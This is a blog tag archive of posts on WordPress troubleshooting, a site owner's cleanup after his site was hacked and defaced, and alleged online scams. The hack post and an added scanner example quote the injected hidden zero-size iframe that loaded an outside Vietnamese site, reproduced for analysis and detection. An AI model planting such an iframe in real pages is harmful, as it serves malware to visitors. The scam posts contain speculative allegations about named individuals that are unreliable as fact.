Tag Archive: Hack

WordPress Permalinks Generated But Not Redirected

Introduction


I’ve had a few site problems whereby my host, Site5, said I was using too many resources and crashing their systems.  Naturally, I was appalled.  I traced this to a variety of plugins plus some errors in PHP files which must have arrived either during the periodic updates or during editing.  These were errors whereby extra text (blank space or a carriage return, to be precise) had been added after the closing ?> tag at the end of a PHP file.  PHP sends those stray bytes to the browser as page output, and once anything has been output no further HTTP headers (redirects, cookies, content type) can be set, which is what the main error complains about.  This is a Google search on the main error I received:

Warning: Cannot modify header information – headers already sent …  (This is then followed by the error details, usually “on line xx”, repeated several times for a variety of xx.)
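The check I would run before blaming a host, as an added example that is not code from the original post: it walks a tree of PHP files and reports the two usual sources of output-before-headers, a UTF-8 byte-order mark ahead of the opening tag and whitespace after the final closing tag. The sample file contents are constructed for the demo.

```python
import re
from pathlib import Path

BOM = b"\xef\xbb\xbf"
# Matches a closing tag that is followed only by whitespace up to end of file.
# PHP swallows exactly one newline directly after "?>"; anything beyond that
# is sent to the browser as page output before any header() call can run.
TRAILING = re.compile(rb"\?>(?P<tail>\s*)\Z")


def find_stray_output(src: bytes) -> list:
    """Return (kind, detail) pairs describing bytes this PHP file would emit
    before its first header() call; an empty list means the file is clean."""
    problems = []
    if src.startswith(BOM):
        problems.append(("bom", "UTF-8 byte-order mark before <?php"))
    m = TRAILING.search(src)
    if m:
        tail = m.group("tail")
        # Discard the single newline PHP itself drops after the closing tag.
        if tail.startswith(b"\r\n"):
            tail = tail[2:]
        elif tail.startswith(b"\n"):
            tail = tail[1:]
        if tail:
            problems.append(("trailing", f"{len(tail)} byte(s) of whitespace after final ?>"))
    return problems


def scan_tree(root: str) -> dict:
    """Map each offending *.php path under root to its list of problems."""
    results = {}
    for path in sorted(Path(root).rglob("*.php")):
        problems = find_stray_output(path.read_bytes())
        if problems:
            results[str(path)] = problems
    return results


# Constructed sample files (not files from the original site):
CLEAN = b"<?php\n// no closing tag at all, the safest style for pure-PHP files\nfunction f() { return 1; }\n"
ONE_NEWLINE = b"<?php\nfunction f() { return 1; }\n?>\n"      # PHP eats this newline
BLANK_LINE = b"<?php\nfunction f() { return 1; }\n?>\n\n"     # one real byte of output
BOM_FILE = BOM + b"<?php\nfunction f() { return 1; }\n"

if __name__ == "__main__":
    for label, blob in [("clean", CLEAN), ("one-newline", ONE_NEWLINE),
                        ("blank-line", BLANK_LINE), ("bom", BOM_FILE)]:
        print(label, find_stray_output(blob))
    # scan_tree("wp-content/plugins") does the same over a real plugin tree
```

Run it against wp-content/plugins and wp-content/themes after every update; a hit on a file you have never edited is a sign the update shipped it that way or that something else has been writing to your files.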

After battling for some time, I just gave up, exported the key database tables (things like posts, comments, etc., but omitting plugin-inserted tables and the very large options table, which I deemed to be very bloated after over five years of continuous WordPress operation…!) and re-installed WordPress as a fresh installation on my server.

Weird Permalink Problem Following Clean Install of WordPress

This is where the weird problem arose….

SP Permalink Settings

When one installs WordPress for the first time, permalinks are set to the default – so this current post would be:

 http://strangelyperfect.tv/?p=11622

For SEO reasons, and for many years, I’ve used the format shown in the screenshot from my site.  This current post will thus appear as:

http://strangelyperfect.tv/11622/wordpress-permalinks-generated-but-not-redirected

It’s a “Custom Structure”, and the .htaccess file is updated automatically by WordPress when you save it (provided the web server can write to the file; if it can’t, WordPress shows you the rewrite block to paste in yourself).  You’ll see it’s set to:

/%post_id%/%postname%/

Now, on firing up a post, say this one,

http://strangelyperfect.tv/11428/victory-or-is-it-victory-jesse-willms-surrenders-all-to-ftc-onslaught/ ,

the actual web address I was taken to was:

http://strangelyperfect.tv/%post_id%/victory-or-is-it-victory-jesse-willms-surrenders-all-to-ftc-onslaught/  (the error is the literal %post_id% tag appearing where the numeric post ID should be)

…which redirected to the homepage of the site, http://strangelyperfect.tv/.  This was not what I was expecting!  So I played with the slashes, went back to the original simple permalink structure, tried some of the suggested structures – and they all worked!

A custom structure of /%postname%/ worked as well, but not the one I wanted and have used for years.
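As an added illustration (not WordPress’s own code) of what the custom structure above asks the server to do: each tag in the structure is swapped for a pattern to produce one rewrite rule, and a request path either matches that rule and yields query variables, or falls through. The tag-to-pattern table is an assumed, simplified stand-in for the one WordPress keeps internally, and the slug is the one from this post.

```python
import re

# Assumed, simplified patterns for the structure tags used on this page;
# WordPress keeps its own table of these internally.
TAG_PATTERNS = {
    "%post_id%": r"(?P<p>[0-9]+)",
    "%postname%": r"(?P<name>[^/]+)",
    "%year%": r"(?P<year>[0-9]{4})",
}


def structure_to_regex(structure: str) -> "re.Pattern":
    """Build the rewrite pattern for a permalink structure such as
    '/%post_id%/%postname%/'.  Literal text is escaped, tags become groups."""
    structure = structure.strip("/")
    pattern, pos = "", 0
    for m in re.finditer(r"%[a-z_]+%", structure):
        tag = m.group(0)
        if tag not in TAG_PATTERNS:
            raise ValueError(f"unknown permalink tag {tag}")
        pattern += re.escape(structure[pos:m.start()]) + TAG_PATTERNS[tag]
        pos = m.end()
    pattern += re.escape(structure[pos:])
    return re.compile("^" + pattern + "/?$")


def resolve(structure: str, path: str):
    """Return the query variables a request path maps to under the given
    structure, or None when no rule matches (WordPress then falls back to
    its default handling, which on this site meant the home page)."""
    m = structure_to_regex(structure).match(path.strip("/"))
    return m.groupdict() if m else None


SLUG = "victory-or-is-it-victory-jesse-willms-surrenders-all-to-ftc-onslaught"

if __name__ == "__main__":
    print(resolve("/%post_id%/%postname%/", f"/11428/{SLUG}/"))
    # The literal tag text in the URL the author was sent to matches nothing:
    print(resolve("/%post_id%/%postname%/", f"/%post_id%/{SLUG}/"))
    # The index.php/ prefix is just more literal text in front of the same rule:
    print(resolve("/index.php/%post_id%/%postname%/", f"/index.php/11428/{SLUG}/"))
```

The second call is the failure mode in the post: once a link is generated with the tag name left unexpanded, no rule derived from the structure can match it, whatever state .htaccess is in. The third shows why the index.php/ form works without mod_rewrite at all: the structure is carried in PATH_INFO after a file that really exists.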

Weird.   So naturally, I tried Google.

Permalink Redirection Problem Solved.

There’s a lot on the web about this.  Most is about getting .htaccess right: the file permissions and the rewrite block.  But mine was okay, as were all the other things suggested.

A real key to resolving my problem was here, Custom Permalinks Generated But Not Redirected in the WordPress forums.  Specifically, it comes from the user, James, a Happiness Engineer!

He suggested adding index.php between the domain name and permalink structure.  So my custom structure changed to:

index.php/%post_id%/%postname%/

WordPress added a leading slash on the save and the website worked!  WAHAY!

However, the best is yet to come….

I thought that the URL was now not pretty; in fact, it was pretty ugly.  The URLs were now being shown like:

http://strangelyperfect.tv/index.php/11428/victory-or-is-it-victory-jesse-willms-surrenders-all-to-ftc-onslaught/

So I removed the index.php and reset the custom structure to what I wanted – /%post_id%/%postname%/

It worked!  WAHAY!  All posts’ URLs redirecting  how I wanted!

Conclusion

I’ve no idea, actually.  I’m suspecting some caching, somewhere down the great inter-tubes in the sky, but apart from that…?  The one certain thing is that every save of the Permalink Settings screen makes WordPress regenerate the rewrite rules it stores in the database and rewrite the block in .htaccess, so the change-and-revert cycle did at least force a fresh set of rules.

  • Was it my server?  Dunno.
  • Was it DNS caching?  Dunno.
  • Was it ISP caching? Dunno

All I know is that it’s working now, and the Happiness Engineer’s suggestion sent me on my way, happy.


Postscript – added 22/11/2015

My permalinks in 2015

Since this time, I have not had to use the index.php fix, and the permalinks are all working correctly.  The flip-flop of adding and removing the fix…just seemed to work!



Jesse Willms Banned by Judge from Negative Option Selling – Assets Frozen!

Frozen Assets

CBC in Canada (with whom Willms has already had a tussle) are already broadcasting that the local high-school athlete drop-out turned internet businessman of dubious repute, the self-styled and self-publicising entrepreneur and charity-giver Jesse Willms, has had some shackles applied to his business: a Seattle court has ordered his assets frozen (in case they’re needed to pay out to his alleged victims and for fines) and barred him from using the negative option gambit on any of his websites.

See the CBC report (and wonderful video) here:

U.S. judge freezes assets of Alberta internet salesman

CBC report on the FTC lawyer Robert Schroeder saying,

The judge also froze the assets of Willms and his companies

I'm not a Flim-flam guy!

This could be the main reason why CBC say that all his websites (that they know of, at least) are down and that his phone is dead.   I’ve checked and the dismal self-publicity blogs are still running, which they would be, I suppose, as they’re not selling anything except the idea that Willms is a “good guy”.  The judge is Marsha J. Pechman, a federal judge of the Western District court in Seattle, according to the post I’ve linked to.  It finishes with the words:

While Jesse Willms has not responded much to these accusations, he has hired many firms to engage in a positive PR and SEO campaign and consistently sends out news releases claiming that he has been assisting charities with financial donations. Additionally, there are at least a dozen “blogs” setup by Mr. Willms to counteract the negative press with positive SERPS.

This is exactly what this website and many others have been saying for over a year now!  “Performance Marketing Insider” also states that:

Currently, according to news reports, there is a both a consumer and criminal investigation against Mr. Willms in Canada.

Well this is good! And only fair – fair to the thousands and thousands of people that feel duped by Willms’ activities.  Roll on next year – Willms is scheduled for trial in the U.S. in July 2012.  Should be sooner.

According to the CBC report, we see another aspect of Willms’ doings whereby he very rarely admits to any mistakes or wrong-doings.  It’s always someone else’s fault, in his world.  CBC say;

Willms has blamed unscrupulous business associates who he claims defrauded him by stealing credit card numbers in order to generate commissions with bogus sales.

I say,

What?  All of them?  All $457 million dollars worth?

Pull the other one!

Willms’ local paper, the Edmonton Journal, also reports on the asset-freezing story here.  They don’t say anything new – but it’s nice to keep the locals informed, don’t you think?

All those local charities that Willms has been plugging his exploits with over the past year must surely be examining their credibility in the eyes of their donating public.  This connection (and, to be fair, the charges are not proven yet) to Willms is starting to look very bad for them; people have long memories and mud sticks.  Ask any politician!

Surely?

Jesse Willms (r), in the source of the famous grinning shot.

Hacked – I was a possible Malware Site for tructuyenso.vn!

Introduction

A few days ago I got hacked.  I quickly ripped out a heap of dodgy files left by the hackers, but for some days now Firefox, my browser, has been saying while viewing pages on this website that it’s “downloading data from tructuyenso.vn…”.

.htaccess

This, of course, was not actually getting anywhere, as I’ve put the blockers on the whole of Vietnam using .htaccess!  The reason for this is that initially tructuyenso wasn’t the only site appearing in the progress tip; there was another, which lasted until I got rid of the various files dumped on my website.  This is the block:

# Order allow,deny: allow directives are evaluated first, then deny, so the
# net effect is everyone admitted except 112.0.0.0/8.
# <Limit> restricts only the listed methods; anything other than GET/POST
# (and HEAD, which Apache treats as GET) is left unrestricted.
<Limit GET POST>
order allow,deny
deny from 112.0.0.0/8
allow from all
</Limit>

However, the call was still being made from somewhere on my site, as the progress indicator wouldn’t stop….  (With hindsight, the .htaccess block could never have stopped it: a deny rule there only controls which clients may request pages from my server, not what a visitor’s browser fetches from elsewhere once a page has loaded.  And 112.0.0.0/8 is an APNIC allocation that covers far more than Vietnam.)

Site5 Search

A search for the string “tructuyenso.vn” turned up nothing in the files on my website using my website host’s file manager.  (In the end, this was my failing and I will not rely on the thing again!)

A search through my database also turned up zero.

TCPView

TCPView is a download from Sysinternals.com (now Microsoft!) that shows the various network connections being made from one’s PC to everywhere.  It immediately showed that as soon as the main strangelyperfect.tv website (not the back-end WordPress admin area) was opened in Firefox, as many as 7 connections were made simultaneously to 112.78.15.230, the IP address that holds tructuyenso.vn plus 11 other domains, some of which I’d seen flash through the progress bar.

Even when closed by TCPView, the connections would immediately start up again to the same IP address, 112.78.15.230  (manually closing strangelyperfect.tv stopped the connections).

Reverse IP on tructuyenso.vn

YouGetSignal.com shows the domains up nicely in the screenshot above..

Result!

Finding nowt anywhere, and Google searches providing zilch on the website in question except in Vietnamese, I turned to the WordPress Codex, specifically https://codex.wordpress.org/FAQ_My_site_was_hacked

I had of course previously changed my FTP, MySQL database and site management passwords, but the link at the bottom to a website malware & blacklist scan (Sucuri) was the killer!  On visiting Sucuri, it instantly said that I was acting as a host for malware and gave the offending results, for free!  (Strictly, the malware itself was served from the Vietnamese site; my pages carried the injected iframe that pulled it in, hence the slowness of the site to load as the browser tried and failed to download shite my way from Vietnam.)

This is their take on it: http://sucuri.net/malware/malware-entry-mwiframehd202

Final Cause and Clean Up

Checking the source code for my homepage (which in retrospect I should have done first!!) threw up “tructuyenso.vn” right at the very bottom.  This is the code as it was when I checked:

<a href="http://tructuyenso.vn" title="Quang cao truc tuyen | Ban hang truc tuyen | Dien dan quang cao truc tuyen" > Quang cao truc tuyen</a>
<iframe marginWidth="0" marginHeight="0" frameBorder="0" width="0" height="0" bottommargin="0" rightmargin="0" leftmargin="0" topmargin="0" nosize scrolling="no" src="http://tructuyenso.vn/"></iframe>
</body>
</html>

This was then easily traced to the footer.php file in my theme, Suffusion.
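The source check I should have done first, as an added example (not code from the original post): a small scanner that reads a template file and reports the kind of injection shown above, an invisible iframe pointing off-site, a script loaded from another host, or a link to a domain the site does not normally reference. The footer below is constructed to resemble the quoted injection and is not the real file.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse


class InjectionFinder(HTMLParser):
    """Collect iframes that are sized to be invisible and point off-site,
    scripts loaded from other hosts, and links to other hosts."""

    def __init__(self, own_hosts):
        super().__init__()
        self.own_hosts = {h.lower() for h in own_hosts}
        self.findings = []

    def _offsite(self, url: str) -> bool:
        host = urlparse(url).hostname
        return bool(host) and host.lower() not in self.own_hosts

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}        # valueless attrs (nosize) -> ""
        line = self.getpos()[0]
        if tag == "iframe":
            zero = {a.get("width", "").strip(), a.get("height", "").strip()} & {"0", "0px"}
            hidden = bool(zero) or "display:none" in a.get("style", "").replace(" ", "").lower()
            if hidden and self._offsite(a.get("src", "")):
                self.findings.append(("hidden-iframe", a["src"], line))
        elif tag == "script" and self._offsite(a.get("src", "")):
            self.findings.append(("offsite-script", a["src"], line))
        elif tag == "a" and self._offsite(a.get("href", "")):
            self.findings.append(("offsite-link", a["href"], line))


def scan_markup(markup: str, own_hosts=("strangelyperfect.tv",)) -> list:
    """Return (kind, url, line) triples for suspicious tags in one file's markup."""
    parser = InjectionFinder(own_hosts)
    parser.feed(markup)
    parser.close()
    return parser.findings


# Constructed footer resembling the injected markup quoted above (not the real file).
SAMPLE_FOOTER = """<?php wp_footer(); ?>
<div id="credits"><a href="http://strangelyperfect.tv/">Strangely Perfect</a></div>
<a href="http://tructuyenso.vn" title="Quang cao truc tuyen">Quang cao truc tuyen</a>
<iframe marginWidth="0" marginHeight="0" frameBorder="0" width="0" height="0" nosize scrolling="no" src="http://tructuyenso.vn/"></iframe>
</body>
</html>
"""

if __name__ == "__main__":
    for kind, url, line in scan_markup(SAMPLE_FOOTER):
        print(f"line {line}: {kind} -> {url}")
```

Off-site links are reported as well because theme credit links are a common place to hide one; review those by eye rather than treating every hit as an infection. The parser treats a PHP block as a processing instruction and stops at the first ">", so a theme file whose PHP contains that character will be parsed loosely, which is acceptable for catching static markup pasted in front of </body>.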

It was simply stripped out and the website then worked fine…..  but to be sure, I downloaded a fresh copy of the theme and checked its footer file – it’s clean!  I then uploaded the whole clean Suffusion theme in its entirety, in case any other theme files had been compromised during the original hack yet were dormant, waiting for a trigger.

A recheck on Sucuri shows my website to be okay now.  See screendump below.   I’ll be using Sucuri a lot more!

Sucuri Site Check

Turkish Hacker-Crackers, perhaps?

A Cracking Week Off?

I had a week’s holiday of sorts last week.  On returning I found that this website had been cracked.  (I already had intimations that something was wrong because of site stat failures and an email from @Justin Asking, sometime commenter on this website and others.)  Anyway, so it was.  Unfortunately, I didn’t have good web access, so was unable to correct things properly.

The main screen, viewable on zone-h here, was replaced by this,

Site Hack Aug 2011

A neat little JavaScript mouse trailer was part of the package!

The cause was my own – a wide-open directory, made so as part of an image upload plugin for my WordPress installation.  This plugin makes it easy and neat for any commenter to add material to the website……unfortunately for me, it accepted any file at all, active content or not.

Needless to say, the plugin is now disabled and the directory is locked down to the specific file types that I’ll accept.  No more active content allowed there, matey!

Unwanted Extras

Once the nasty files were uploaded, the internal site privileges allowed the install of a swathe of .htm files to the site root and uploads folder.  These had various names like f.htm, g.htm etc.  Index.htm was the file on show.

Alongside these, apart from the files needed to run the previously mentioned JavaScript, was another swathe of .phtml files, such as joker.phtml.  These are PHP code wearing an HTML-looking extension: many hosts map .phtml to the PHP interpreter just as they do .php, so an upload filter that only blocks the .php extension lets them straight through.  A couple of plain text files had also been uploaded.  These had lists of files, sites and persons.

All .htaccess files were okay, as were the WordPress installation files.  To be sure, I redid the WordPress install from scratch with freshly downloaded files.

Finale

All told, about fifty files were dumped on my website.  I’ve hopefully removed the lot and have them downloaded for analysis at a later date.  The screen content and internal code all point to Turkish or S.E. Asian (Vietnam or Indonesia) Muslim crackers (I refuse to use the hacker term except to clarify the cracking of security by its now-common usage).  Saying this, the culprits could have come from anywhere: the code points to several authors who used freely downloadable files from cracking websites and then proudly expected a pat on the back for their extreme skill at doing a download…like….der….

Fifth columnists and agent-provocateurs are nothing new.

Interestingly, being cracked puts me in the same company as at least 186 well-known multinational businesses, such as Acer, Vodafone, BetFair, The Daily Telegraph, The Register, Spam.Org, Victoria Beckham and Destiny’s Child.

Even System of a Down dot com, was down!

Zone-h’s full list is here.  The Register reports it here, The Guardian here.

The Guardian interview with the crackers notes that the culprits had been planning the attack for some time, which includes the time when my site was compromised.  I don’t know if my website was actually used as part of the above DNS server attack.  The two are different kinds of attack, though: the mass defacement hijacked the big names at the DNS level and sent their visitors elsewhere, whereas mine was a file upload into a directory that let scripts run.  A DDoS, for its part, only exhausts a server’s resources; it does not make a server “dump code” or give up passwords, so that is not how mine was got at.

Addendum

WordPress.Org’s forum has a posting about this crack from last week.  A Google search in the comment by RedNeckTexan shows the attack on this website to be far from unique….!   The links I’ve followed go right to the heart of the crack and the people doing the cracking.

This is the Google Search on the “Easy Comment Uploader” plugin.  Like me, RedNeckTexan has pulled the plugin for now, which can be found in the WordPress repository here.


From Google Treasure Chest to Ubertan Sun Tan Scam in Nevis on the BBC?

A.  Yes, it’s true!

Ubertan On BBC

An article on the BBC website today highlighted the dangers of a tanning product called Ubertan.  On reading it, and following up with a simple Google search, the way it is portrayed in forums immediately set off warning bells because of its similarity to other scams I’ve seen.

Ubertan

Ubertan Search

A simple Google search showed that warnings about Ubertan have been going on for some time.  This website warned way back in April 2011, and here we have a Men’s Health forum being shilled by Ubertanners with a post starting in Jan 2011…  The first even shows that the Ubertan website changed its copy when folks started complaining.

The Ubertan website is currently ‘live’ however, it is showing no content!  At all!  The Google cache is interesting though (more on that later)…

WHOIS Ubertan

Ubertan WHOIS

Who is Ubertan indeed?  !!

Warning Bell

What we see is that “Manufacturers Direct” owns several domains and one Vernon Veira is the contact, on the dual-island nation of St Kitts and Nevis.

10 Solomons Arcade
Charlestown,  00000
KN
+1.3057484919

This is when the warning bells started ringing….

Doing The Charlestown in Nevis

It’s two years ago that I started looking at the now seriously-discredited Google Treasure Chest scam (see http://strangelyperfect.tv/3099/google-treasure-chest-its-a-scam-and-a-half/).  The amount of information I had meant I had to post over several different postings, and it was during these later investigations that a Post Office address (P.O. Box) came up on Nevis.  In Charlestown.

Unfortunately, I couldn’t remember exactly what address it was.  But it’s easily found here, in a comment from @NotKevin.  I think it’s the first time we saw the address, although it has since popped up many times when checking out folks who would prefer to be known as “online marketeers” but whom we like to call scammers.  This is on the posting,

This is the address.

New Online Systems Ltd.
P.O. Box 642, Main Street
Charlestown, Nevis, West Indies

Google Cache

Ubertan Google Cache

Ubertan may be silent, but the Google Cache is active and shows this address down at the bottom of the first cached page:

Ubertan.com +44 161 408 5816
Subertan Ltd 642 Main Street, Charlestown, Nevis

Uber morphs into Suber, and because the Post Office on Charlestown is one of the few buildings on Main Street, Charlestown, a whole host of P.O. Boxes exist inside.

P.O. Box 642 means 642 Main Street!

Who are these people using 642?  I don’t know.

What I do know is that the domains listed by @NotKevin, although not exactly the same,  bear a shocking similarity to those domains used by people like Jesse Willms (say) before he decided to turn into a saint-like activist and Pacific WebWorks (say) before they got their pants sued off them.  This is what @NotKevin said:

That West Indies address is also linked with porn:
http://www.highdefriches.com/contact.php
http://www.eshspt.com/
(another Co Durham address on that one too!)
“health products”:
http://hiltonhg.com/
Colon cleansing:
http://www.colocleansemax.com/contact-us.php
Acai:
http://acaidetoxmaxx.com/
and Govt Grants:
http://www.complaintsboard.com/complaints/government-grants-avaliable-cd-c116063.html

Now compare and contrast those domains and businesses with the very large list to be found here on WebCops – the plethora of time-limited similarly-named domains means tracking them is an onerous task, well beyond my spare time.

However, yet again, we have seen the same address appear when dealing with dodgy ego-massaging products.

Phoenix-Like TryUbertan

Ubertan may be dead, but it doesn’t take long to find son-of-Ubertan when looking at the decidedly un-Caribbean telephone number for Ubertan.

+44 161 408 5816 is actually a Manchester, UK number!!

TryUbertan Contact Page

A quick search pulls out…..

Beginnings

Now I know they’re trying to hide!!!

TryUbertan.net on the T&C page now shows the address of Ubertan to be:

Ubertan Sunless Tanning System
c/o Toocoo Media Inc.
39555 Orchard Hill Place
Suite 600
Novi, Michigan
48375

Although it’s supposed to be available from ” high end salons in the U.K, France, Germany, Spain and North America” from their FAQ page, these stores will be doing so ILLEGALLY!  The UK government has officially banned it (as per the UK news item) and is EXPLICITLY ISSUING DANGER WARNINGS about its usage!

Still, TryUbertan (WHOIS is Pennsylvania USA) don’t care.  They’ll just grab the cash and morph into something else.

TooCoo Media CEO

The decidedly minimalist website of Toocoo Media Inc, http://www.toocoomedia.com, throws up some interesting conundrums, if that really is their mailing address.  There are two LinkedIn links:

  • http://www.linkedin.com/company/toocoo-media-inc.
  • http://www.linkedin.com/in/jumanok

The latter is for the CEO, a Peter B. Lee whose 3 website links at the bottom of his profile point to the totally and bizarrely un-related websites of:

  • http://www.viafoura.com/
  • https://www.netiq.com/products/migrate/ which then redirects to novell.com as Novell has bought them out
  • http://www.oracle.com/index.html

Mr Lee, who claims to be Canadian from the LinkedIn profile, also has a poetry blog on Blogger, assuming the same quite distinct user name is being re-used, which is for invited guests only!!!  See The Poetry of Peter B. Lee with the URL of http://jumanok.blogspot.com/  I’ve highlighted his key username as it matches the LinkedIn profile.  I don’t think that this Peter Lee (interestingly, a place name in County Durham of all places!) is the same whose name is used in some recent versions of the classic 419 scam.  Try these examples for a start:

To add to the surreal mix that I’m uncovering, there are also two videos on YouTube uploaded by a “jumanok”!!  One of half a minute looks very much like Mr Lee, doing  some testing thing in Nov 2008 here:

This is a screenshot in case it’s pulled:

Jumanok YouTube

This is Jumanok from LinkedIn:

Jumanok LinkedIn LargePic

And here is “Crystal” telling us how her life state has improved after seeing something on OPRAH (down below she says) – except there’s nothing below!!  It appears to be a video plug for something intended to include Oprah in the spiel, except it never happened as there’s nowt to see.  This was uploaded in May, 2009.  The termination of Oprah-related plans may or may not have had something to do with the legal action, taken in May 2009, by Oprah, and reported here on her website;

http://www.oprah.com/health/The-Truth-About-Oprah-Dr-Oz-Acai-Resveratrol-and-Colon-Cleanse

Of course, Oprah sued and won damages against a host of scammers, one of which was Jesse Willms.

Conclusion

  • Time and again we come across scams that are based on a business with a very flaky base (here it’s a banned tanning product with government-issued health warnings).  Usually, they are about improving one’s body or finances via unproven “new” medicines or foodstuffs, or get-rich-quick schemes.
  • Time and again we find a myriad of international contact phone numbers & addresses, for businesses that are very minor and specialist yet feel the need to spread themselves to the far corners of the globe.  Q. Why?  A.  Avoidance of easy scrutiny.
  • Time and again, we trace these businesses via LinkedIn (a bit like Jonathon Eborn, say) and other social networks high and wide.  They all start off appearing very legitimate.   As an aside, the Eborn results show a consulting website of http://www.jonathanebornconsulting.com/ and another of http://www.jonathandeborn.com/ which have both been hacked and defaced!  Made my day that!
  • Many businesses have a very public website, of minimalist design and content.  It’s very hard to discern exactly what they’re doing.  Compare these “online marketeers” to the website of Ford or Esso, say?  Now can you tell the difference?

Finally (and very importantly for your health), don’t shove dodgy untested stuff of unknown provenance up your nose.  Simple, eh?


© 2007-2017 Strangely Perfect All Rights Reserved -- Copyright notice by me